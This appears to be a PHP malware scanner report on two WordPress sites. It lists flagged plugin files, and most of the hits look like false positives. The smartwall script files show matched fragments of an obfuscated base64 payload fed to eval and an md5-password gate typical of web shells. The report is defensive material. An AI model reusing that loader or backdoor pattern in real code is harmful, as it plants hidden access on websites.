'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/456/5eb/4565eb438f07207bac9866637c6b5959.php Size: 26.68 kB Created: 2020-11-28 22:00:21 Modified: 2020-11-28 22:00:21 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/583/e34/583e34ec8c9d0a35da664819edd1bc07.php Size: 80.01 kB Created: 2020-11-28 22:01:15 Modified: 2020-11-28 22:01:15 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 694 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguaW5kaXZpZHVhbGtpLW5pemhuaWotbm92Z29yb2QyLnJ1LyIsCiAgICAicmVzdWx0c3R5cGUiOiAidmVydGljYWwiLAogICAgInJlc3VsdHNwb3NpdGlvbiI6ICJob3ZlciIsCiAgICAicmVzdWx0c1NuYXBUbyI6ICJsZWZ0IiwKICAgICJyZXN1bHRzIjogewogICAgICAgICJ3aWR0aCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfdGFibGV0IjogImF1dG8iLAogICAgICAgICJ3aWR0aF9waG9uZSI6ICJhdXRvIgogICAgfSwKICAgICJpdGVtc2NvdW50IjogNCwKICAgICJpbWFnZXdpZHRoIjogNzAsCiAgICAiaW1hZ2VoZWlnaHQiOiA3MCwKICAgICJyZXN1bHRpdGVtaGVpZ2h0IjogImF1dG8iLAogICAgInN...
| Sign 7830f7a6 Line: 694 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign 7f5d33bf Line: 694 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign d30fc49e Line: 694 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 694 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/94b/439/94b439a06468ad5be49fd773b8f6a56a.php Size: 509.13 kB Created: 2020-11-28 22:01:06 Modified: 2020-11-28 22:01:06 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/1f6/2f0/1f62f0b7fd819c9338c5b451dfebcc33.php Size: 79.77 kB Created: 2020-11-28 22:01:40 Modified: 2020-11-28 22:01:40 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 694 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguaW5kaXZpZHVhbGtpLW5pemhuaWotbm92Z29yb2QyLnJ1LyIsCiAgICAicmVzdWx0c3R5cGUiOiAidmVydGljYWwiLAogICAgInJlc3VsdHNwb3NpdGlvbiI6ICJob3ZlciIsCiAgICAicmVzdWx0c1NuYXBUbyI6ICJsZWZ0IiwKICAgICJyZXN1bHRzIjogewogICAgICAgICJ3aWR0aCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfdGFibGV0IjogImF1dG8iLAogICAgICAgICJ3aWR0aF9waG9uZSI6ICJhdXRvIgogICAgfSwKICAgICJpdGVtc2NvdW50IjogNCwKICAgICJpbWFnZXdpZHRoIjogNzAsCiAgICAiaW1hZ2VoZWlnaHQiOiA3MCwKICAgICJyZXN1bHRpdGVtaGVpZ2h0IjogImF1dG8iLAogICAgInN...
| Sign 7830f7a6 Line: 694 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign 7f5d33bf Line: 694 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign d30fc49e Line: 694 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 694 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/global-nogroup/f55/b98/f55b98702c61c96429f9ed889e85823d.php Size: 50.23 kB Created: 2020-11-28 22:02:59 Modified: 2020-11-28 22:02:59 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-08-13 14:54:23 Modified: 2020-08-14 10:30:33 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-08-13 14:54:24 Modified: 2020-08-14 10:30:33 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-03-14 17:36:50 Modified: 2021-03-14 17:36:50 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-03-14 17:36:45 Modified: 2021-03-14 17:36:45 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-03-14 17:36:46 Modified: 2021-03-14 17:36:46 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-03-14 17:36:58 Modified: 2021-03-14 17:36:58 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-03-14 17:36:57 Modified: 2021-03-14 17:36:57 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 13:37:19 Modified: 2020-09-27 13:37:35 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 13:37:19 Modified: 2020-09-27 13:37:35 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 13:37:19 Modified: 2020-09-27 13:37:34 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-08-19 15:53:31 Modified: 2020-08-19 15:53:31 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-08-19 15:53:31 Modified: 2020-08-19 15:53:31 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
